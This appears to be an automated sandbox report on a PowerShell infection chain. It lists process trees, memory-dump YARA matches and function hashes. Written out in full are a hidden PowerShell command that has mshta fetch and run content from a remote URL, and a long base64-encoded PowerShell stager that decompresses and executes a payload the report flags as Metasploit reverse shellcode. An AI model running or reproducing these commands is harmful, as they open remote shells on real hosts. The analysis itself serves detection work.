2025-03-14 13:21:15 UTC	215	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 34 38 36 37 26 6d 69 6e 5f 72 74 74 3d 31 36 37 38 26 72 74 74 5f 76 61 72 3d 37 30 30 37 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 39 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 31 26 73 65 6e 74 5f 62 79 74 65 73 3d 34 30 39 39 26 72 65 63 76 5f 62 79 74 65 73 3d 39 31 36 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 32 34 32 32 38 26 63 77 6e 64 3d 31 32 38 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 36 66 30 33 31 64 62 31 35 32 65 37 30 34 31 37 26 74 73 3d 37 32 35 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=4867&min_rtt=1678&rtt_var=7007&sent=6&recv=9&lost=0&retrans=1&sent_bytes=4099&recv_bytes=916&delivery_rate=324228&cwnd=128&unsent_bytes=0&cid=6f031db152e70417&ts=725&x=0"
2025-03-14 13:21:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:21:10
Start date:	14/03/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'https://iplogger.cn/forensicsas.png'"
Imagebase:	0x7ff7016f0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:21:10
Start date:	14/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:21:13
Start date:	14/03/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mshta.exe" https://iplogger.cn/forensicsas.png
Imagebase:	0x7ff63ac60000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: WiltedTulip_WindowsTask, Description: Detects hack tool used in Operation Wilted Tulip - Windows Tasks, Source: 00000002.00000002.2087634483.000001B94B52D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: WiltedTulip_WindowsTask, Description: Detects hack tool used in Operation Wilted Tulip - Windows Tasks, Source: 00000002.00000003.2077055407.000001B148943000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:21:16
Start date:	14/03/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEALwA2ADEAWABhADMATwBpAHoAQgBMACsASABIADgARgBIADEASwBsAFYAawB3AE8AeABNAHYAcQBuAGsAcgBWAEkAaABmAEYAQQBKAEcATABsADUAZwAzAGwAVQBJAFkARQBSAGsAQgBZAFIARABKAHUALwB2AGYAVAA0AE8AYQB6AFoANQBOAHoAdABtAHEAYwA2AHkAaQBIAEcAYQBtAHUANQA5ACsAcAByAHUAbgBNAFIAQwA1AE4AawBqAHMAMgBVAFEASgBIAFUAUgBkAFQAMQBHAGMAZQBHAEYAQQAzAFYAWQBxAGwAMQB2AEwAUgB4ADUASgBRAHUAcQBPACsAbABhAHQAcgBOAEwAQQBKAHMAVgBTAE0AWABoAHgARQBYAG0ASgA0AHQAQgArAHMAUgB3AG4AUgBrAGwAQwAvAFYAMgA1AEcARgB1AHgAdABhAFYAcQBsADMAcwByAGYAdABtAEcAVABvAHAAUgBnAHkAcABmAGkAbwAzAEkAUwBXAE4AVQB2ADcAaQBvAFgASgBSAFQAYQBaAEIAWQBLAC8AUQBTAFcATQBUAGIAbwA1AGMAdABJAHUAdgBRAFMAYwBCAFEANwBZAG0ATgBJAGoANwBjAFcAbAA3AHcALwBQAFUAcgBsADgAWQB4AEMAcwBqAHgALwBXAGEAQQBDAEoAcwBrAGEATAB2AEUASABrAHAAcQBkAGUAbwA3AE4AVgB1AGoARwBGADAALwBMAEQAZgBJAEoAdABUAGYAMQBPAFgATAB6AFEAQwBIAFMAdwB1AGYAdAB1AFcAYwBaAGEALwBCAEsAVABaAHcAaQBqAFUANQB0AEsAMwBDAGcAeABzAGoAdwBoADYAcABWAGYALwA2AHEAMQBwAC8AdQBtAGEAZQBiADQAUgBkAGEAdQBHAGsAVgBqAFgAeQBoAEsARAB0AGoAWQBOAHgAdABVADcAOQBxAEIAYwBHAHoAVAB4AEMAdABhAHIAaQAyAFgARwBZAGgAQwB0AHkATQAvAE8AQwA1AHUAMwBOAHAARQBTAHYAbAB1AEMAVgBJAC8AWgBxAC8AZQBTAFoARwAxAG4AZwB4ACsAZABPAEYAbABxAFAATQByAFUAcQBEAE0AZgBBAEQAWAB2AGsAcwBOAHEAZwBuAGcAcAA3AFQAOAAvAFAAMQBMAGMAMwBOAEgAbwBhAEUARwArAEwAYgBxAFMAQQBvAEQAaQBNAEQAQgBUAHYAUABSAHMAbABOADAATQByAGMARABEAFMAMABRAHIARQBxAGcAawBjAFkAZQBCAFcANgB3AEEAaQBSAGkAUwBOAEEAKwBxAE0AQgBlAFQAMgBvAFkAOQBxAGwAMABHAEsAYwBRAFAAMABQAHYAMgBwADMAdQBlAGEAaQByAEkAegB1AFgAOABxAFYASABzAHYAQgBMAHYARwBKAEsANAAzAFQAagBIAHgASgAzAFEAbwBaAGQAdwBjADEAWQBFADcAdgA2AEYALwBGADEAeAAxACsAUAAwAFcAWQBQAFgASwBqADgAbwBIAG8AZQBvAGcAagBGAHkATABvAEIAYwBDAC8ATAA2AEwAMQBjAHIARgB4AFYATQA1AFIATwBCAFAAYgBSAHcAbQBYAGkAbAAzAFIAOQBFAE4AUwBnAEUAUQBGAGcAbgBqAHYARABoAE8ATQAwADUAUgAvAGYAbgBuACsAUgB6AE4AbgBpAFcAVAB4AHEAZQBLAG0ATABQAFUAUwBlAFoANABQAEUAYwBjAGQAOQBUAFQATgBQAFMAYwA1ADgAcABGAHYAWABLAEsAbgBtAEwAKwBaAFoAbAA2ADIARQBGAHgAcwBmADUANQBOAHYAQgBvADUAUQBXAEkAegB3AE4AcgA2ADkAbgBuAGcASwA5ADkAZABHAFoAbwBoAFYASABKAHgAOAAxADUAbQB3AG8ANABhADkAWABUAEEAbgBMADQARQB6AHYAVgBnAHQAQwBuADMAOABXAEUAcgBVAGYAZQBaAFAAdABIAGMASwB3AE4ANQA1ADQAQQBLAGcAaQBKACsAcQA5AGcAagBtAGQAWQBxADAAcQBCAGcAcgBiAEEAMwAvAEUAZAB3AHYAUgB5AEIAVwBtAEcAegByAHQAUABxAFoAVwBmAHIAUgBmAHYAUgBTAHgAegAyAEUAcQBTAEIAagBWAE8ASQBjAC8AdABCAG0AVQBnAEMAeQBPAG4AUQBiAEYAQgA0AHAAMgBXADIASgBTAEUANQBiAEQANgBFADYANgBTAFkAdQBMAFoAVgBrAEwATwA2AHAANwByAEgAMQBCADYATQBzADIARgBBAFcAUgBNAGEAcwBQAHAAQQBnADIAbQBFAFMASABiAHMAMwBEAEIAUwBvAE0AYQBlAGcANwBxADUANABiAG4AbgBpAEYAVQBQACsAUwBFAHMAegBDAEcAbABBAE4ATgBlAHoAZwBUAG0AQwBtADQATQBFAGcAUgBNADcASABUACsAUABmADQAcQBOADgAWQBpAEUAagBiAEMASwBNAHQANwBDADYAcgBrAEkAZwB0AEYAMgByAE8ASwBhAFAASwBjAEwATgBjADUARgBUAC8AQQArAHgAegBuAGgAeQBUAG8AdQBEAHEAVABOAEkANwAwAEIAQQBBAEIAZwA1AEoAZwA1AHAANgBNAFkARwA2AFYAbQAzADgARgBuAGoALwBHADcAeABmAFMAOAB3AHYATQBMAGsAWQBuAFEANgB5AFYAaQBiAGkAVQB6ADgAbgBSAGIAcABjADcAbAAvAHMANABuAHEANQBlADIATwB5ADUAQwAwAG0AdwBKAGsAWQBoADkAdQArAGwAYQBCAE8AeQB5AGkATABXAEsAMwBhADcASwBZADcASwBWAGMAMgBXAGkAYwBlAEMASAB0AHgAdQBCAHMASwBKAGoAeAA3AGUASgBvADcAVQBaAEQAbABrAFIANwAxAGQAZABrAFcAMABvAGYAeABrAEIANgB0AEoASwAzAEwAdAA5AEkAcwBsAFYASwB6AFQAegBkAEYARwB2AGEAOQA3AGcAYgBDAFMAdABvAC8AaABJADkATQB1AG0AMAB4AFQAaQBUAHQAVgBaAGgATAB2AHUAeQBHAEMAUwAvAHQAZQBYAFoANAB1AHcAdgBGAGoAdQB2ADEAVABuAHEATwA4AHQAbwB5AFkANQBaAHoAUwBmAHkAeQBIAEkAaQB0ADQAVABRAFIAaQAvADEARABhAGQAOABYAGQAMQB3AHYAaABQAEUALwBwAEQAMABYAGoAawBDAHUAMgA0AG0AQwBmAHUAYQAwAGsARABEAHEAbwBMAGwAcwBaADAAMwBTAFIAWgBaADcAeQBPACsAbgBWAHcAYgBOAEQASwBhADUASwBrACsARgBTAEQAVQBDAFIAMQA0AHkAbQBqAGgAUwBYADIAOQB6ADgAQQBuADgATQBwAHAARABuAFgAYgBnAE0AUQA2AFkAbQBZAFcAbQAzAFUAdAAyAHcAOABKAGYAMQBKAGQAMwBkAGoAQQBhAFMAYwBOAFIAYgB2AFIAYwBYAHMAcgBWAHoASwBZAEoAdgBZAHQAZgBjAFgATwA4AGUATQAxADMAWABaAEIAWABXADgARABKAHcAYwBnAFYAdgBkAFYAeABEAHYAWgBjAHoATwB5ADUASwB1AGYARABSADMAVQBBAE4AbgBiAHAAegBHADAATgBWAFQAawA4AHMAQgB1AHAARQAvAE8ARwA0AGIAdwBhADUAbwBFAHgAbQBBAFgAZQBXADMATwA3AEYAMgBTAGwAZgBjAE0ANQBaAE0ANABrAGUAUgBpAFoANQBMAEUANQB0AHIAYQB0AFAAQQA4ADYAaAByAFMAUgBEAHIASQBkAGsAZQBsADgAMQBJAG0AdABuAEkAdABrAEQAeQAzADcASwAxAEwAbwBIAGMAawBMAGQAOQBRAFQAWQBDAHkAUQBBADIAMABZAGUAdQA2AEEAWABUAHcAMAArAFgAdQB3AEcAMwBDAEsAQQBqADUAWQBiAGYASABSAFIAOAAzAHgALwBVAHgAOQB0AFoAdAA5ADIAYwA1AGoAeQBaAFAAeQA4AFgAMwBIAEEAOQAxAGQAbwBqAFIAaABuAGgAZQB3AE0AZgBVAFgATwBpAEQAVgBlAEoAMQBWAEIAWgBmAFIAVABEAHAANgA0AEMAZgB0AGUAMQBOAGoAUgBoAE4AdQAvAEcAVwBqADIAVgBxAHYAZgB4AEIAeQA1ADUAYQBnAEUAUQBrAFkATABuAEQAYQAzAGcANgB0AHMAWAB2ADEAMgBEADYAMABTAFcAdgBvADAAegAzAGsANwBmAFoATQBVADQAMwBTAEsAOQAvAHkAYgBmADMAaAA4AGIAYQByAHIALwBmAEQAagBSAHMASwB5ADAARgB6AHcAYQBtAGUASgB2AFEASABFADgAWgBlAHMASQB3AHoAbQBEAEcAMgBZAGoARABPAGcANQBuADEAdQBBAG0AagBqAGcAMgAvAHoAMAAzAHAAUwBEAEcAMQB3AC8ASQA0AHYAMQA2AGEAZgBuAGUAcwBZAGQAVQBFAFAASwB5AEcAbgBYAHQAVABvAEoAVQBaADMAUgA0AFAAUgBBAGsASgBHAFcAMwB4AG0AYQA5AHcAKwB0AG8AWQByAGgAVgAxAGsATABlAGkAUgA3AC8AUAA2AGwAaQBkADgAOQBzAGUAWgAwADcAMABtAGUAYgByAGcANABHAG0ARABrAHkAdABmAFcAdQB6AHYAWQBGADUAMgBpAHQANgByAGMAaQBlAEwARQBRAGQAaQA0AE8ASgA3AHYATgBnAGIAegA0ADUAKwBBAG8AdgA5AEIAVwBkAGYAbABTAE4ANgBXAGcARwBhAHgAWQAvADYAUwB1AG0AbQA2AFgAMwBzAHgARwByAEMAUQB0AHoAbQByAFcAMwA1AHEAVABZAEUANgBsADYAMwArAGQAMQBFAGQAOQBQAHMAaQA2AHYAMAB3AHYAUgBwAEUAZAB6AEgAZgBRADYARwBIAHoAVQAyAHAANAB1AEwATgBUAHAAdwBlAGUAWAAvAG0ARgBoACsATAAyAHgANQBtAFkAegBYAGwAZAA0AHIAcQBuAGYAbQB4AE4ASABtAFkAbwBzAHYANQB6AGIAdgBLAGoAUgAyAG8AQgBWAG0ANQBOAEoATgBOAFIAOQBaAHMANwAzAE4AVgBVADQAdQBQAHgAawBPAGwAawBJAGEAMABrAFYAcwBwAEEASAAvAHkAWABkAFYAWAAzAGQANwAwAHMAbQAxADQAcQBrAHIAdQA0ADgAMwBuAEwAcgBUAGoASQBSAHgAcQAzACsAeABtAFcAMgAzAFkAeABjAGsAYwBEAG4AaAB2AGYAdABqAEEAbAB4AEoAbwA4ADcARAA2AE4AbABQAHUAMAArADQATgBTADAAcgA3AEkAWgAyADkAbQBoAGkAQwBYAHkAZgBoADMAYQBmAFcAeABmADcAUgBtAGwATwBkAEMAMABqAGQARgA3AG0ATABsAHoAaQBFAFUAZgBiAHkAQwBPAFgAeQBHAG0AWgBYAGcAMgBVAGwATwBYAFUAYwB2AEoARABoAEIAagB5AFcAaQBuAHkAQgB6AGsAeQB6ADcASwA3AGYAdABZAGMASQBSAGsAdwAwAEsATwAyAE0ATwBwAHIAQwB4AG4AdQA4AHgANQB2AFkAMQBTAGQAZAA2ADIAWABGADkASwBPAGMAagB4ADUAUQBCAGQAOABmAEsATwBmAEwARwBiAFEAcABzADEASgA3AFEANgBtAFQANQB1AEIAaQB0AEcAOQB0ADIANwB1ADYASgB1AHIAYwBJAFkATwBwAEgAWAAxACsASgA2AC8AeQBkAFYARABLADQAeABvAFUANgAxAEMAUwBvAFMAbABMAHAAeQArAHUAcQBxAFgAcgBRAEkAcAA0AFUAbgBtAEgAawB1AE8ANwBwADMAcgA5AGYATABBAHkAaAByAHQAbwBzAGkAVgA1AGIAQgB2AGYAVwB1AHUASAAzAFcASgBTAGwAVwBuAEsAdwB0AEQARQBVAFAATwBwADMAegBQAFMAVwBHAHMAWABqAHEAVgA4AGEAaABWADAAagBVAGEAaAArADMAMgBEADYASwBBADQAUwBoAC8AWQBRAEcAOQBWAHoAZABXAFkAeABEAHUAKwBpAHcAUABtAGwAMQBvAE4AOAA3AGQAbQBIAFAAYwBJAHQATgBZAE4AaQA4AC8AWABCAFUAcAA5ADQAMgBRAGwAdAAxADkARwBtAFoAcgBsAFoAbABGADMATAB5ADgATgB5AE0AbgBUAGQAKwAvAGIAbwBBADkAeABwAHYARABNAG8AbwBjAE0AbQA2AFEAZABHAEgASgBrADMAVAB4AFgAKwBMAHIAbABmACsAbgBCAFEAdQBqAFAATABhAFMAVgBtAGoANgBNAEQAZQBvAGYAaABwAEIAWgBkAFcANgBpAGYAZQA0AHoAVABZAG8AdgA4AGoAOQBiACsAWQAvAE8AKwBrAEYAcgBTAFYATABkAHcAYgBhAFMAVwBnAGoANQBtAHEAVgA2AHIAZgBLAGgAVgBwAFIAYgAyAGIAVAA3AHgAWAArAEUAQgBCAE8ANgBwAGIAeABsAHgAQwByAEoAaABjAGIAOABJAGwAZgBNADIAVQAxADMAUAB0ADAAcQBwAFQAawBqAEMAbgBMAGkAMwBxAEIAMwBVAE4ANwByAEYASgA4AHgAWQArAGEAVwBJADMATABlADUAcQA2AHUAZABYADIAbgBjAHEAcwA3AHkAagA4AEgAZABLAFIAegBhAEMATAB2AHQANgBGAEMANABoAFIAaABHADAAWABZAFgANgBVAHQARgBaAEEATwBiAC8AQgBRAFAAaQBmAHgASAArAEQAUQBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwAKAA==
Imagebase:	0x7ff7016f0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000003.00000002.2000051277.000001E1C2463000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000003.00000002.2000051277.000001E1C2463000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000003.00000002.2000051277.000001E1C0ADA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000003.00000002.2000051277.000001E1C0ADA000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000003.00000002.2000051277.000001E1C2433000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000003.00000002.2000051277.000001E1C2433000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: WiltedTulip_WindowsTask, Description: Detects hack tool used in Operation Wilted Tulip - Windows Tasks, Source: 00000003.00000002.1997538671.000001E1BE6F0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000003.00000002.2000051277.000001E1C2482000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000003.00000002.2000051277.000001E1C2482000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000003.00000002.2000051277.000001E1C243E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000003.00000002.2000051277.000001E1C243E000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000003.00000002.2000051277.000001E1C1D34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000003.00000002.2000051277.000001E1C082F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000003.00000002.2000051277.000001E1C1878000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000003.00000002.2000051277.000001E1C1878000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:21:16
Start date:	14/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:21:18
Start date:	14/03/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6ca680000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	09:21:23
Start date:	14/03/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Imagebase:	0x3e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Shellcode_Generic_8c487e57, Description: unknown, Source: 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_38b8ceec, Description: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., Source: 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_24338919, Description: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., Source: 00000006.00000002.1389765781.00000000077D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Shellcode_Generic_8c487e57, Description: unknown, Source: 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_38b8ceec, Description: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., Source: 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_24338919, Description: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., Source: 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000006.00000002.1370317295.0000000004CC5000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:21:23
Start date:	14/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff62fc20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FFC3DA733B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1184360791.00007FFC3DA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DA70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc3da70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: ba5ae0cbf7594f7b04ce7750577559e3bcfba9ff95d775cbd39cffd2fe7c464b
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: 2401A73110CB0C4FD744EF0CE051AB5B7E0FB85364F10052DE58AC36A1DA36E882CB45

Analysis Process: powershell.exePID: 7540, Parent PID: 7472COMMON

Executed Functions

Function 00007FFC3DB42EF3 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2071574643.00007FFC3DB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc3db40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e84517fac46c4b72923bbf4360822bb332b5ef8d203c2a3d4300f483a7b4dad8
Instruction ID: 1558c7eb1fe768a0fb15a732123b986d37c1250c78531f0765c51ad21c51e7f9
Opcode Fuzzy Hash: e84517fac46c4b72923bbf4360822bb332b5ef8d203c2a3d4300f483a7b4dad8
Instruction Fuzzy Hash: DAF13131E4DAAE4FEBA6D76848556B57BE1EF16354B4C00FED04CCB2D3EA189805C362

Function 00007FFC3DB43081 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2071574643.00007FFC3DB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc3db40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90472c57c9ae4965400ef84f915d54dcbb40a403ef6cf2554e1583f9179a1a2a
Instruction ID: e5f9c37369437c0b711e260e0851f702e439d25f73c25874b331ed9163cacc19
Opcode Fuzzy Hash: 90472c57c9ae4965400ef84f915d54dcbb40a403ef6cf2554e1583f9179a1a2a
Instruction Fuzzy Hash: 76710431E4DAAE4FEBA9D6A84451278BAE1EF55385B9C00BEC00DC72C3ED189C05D776

Function 00007FFC3D95E7E0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2070275225.00007FFC3D95D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3D95D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc3d95d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab5721e3fbbfb111577f84f95aa220d6a9f8af94c48e627c247851d9968fbe24
Instruction ID: 0c7f7528b7bbb3e55c8adb9c86dbea063eab1479cd374fd8426928aa551449bc
Opcode Fuzzy Hash: ab5721e3fbbfb111577f84f95aa220d6a9f8af94c48e627c247851d9968fbe24
Instruction Fuzzy Hash: CF412C7080DBC84FE7569B3898559523FF1EF57320B1505EFD088CB1A7DA29E846C7A2

Function 00007FFC3DA7434A Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2071013448.00007FFC3DA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DA70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc3da70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f2f416a1a9ab964f68d8819e4689fa8d4556bc2e007e0646af4b475fd9005e4
Instruction ID: 2ef873faa37e2cb9df5d1e88c2b322a341f6dfcd256a908c5e779d9acdfd32d1
Opcode Fuzzy Hash: 7f2f416a1a9ab964f68d8819e4689fa8d4556bc2e007e0646af4b475fd9005e4
Instruction Fuzzy Hash: 8D31E37260DBC94FD706D778A8914A07FF1EF5722071905EBD0C9C71A7E929A807C7A2

Function 00007FFC3DA737B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2071013448.00007FFC3DA70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DA70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffc3da70000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: 5741deb22278e40f90b0163181d0dededcf5653a4d0115d71647eace61691dab
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: 4F01847110CB0D4FD744EF0CE051AA6B7E0FB85364F10052DE58AC3651D626E882CB45

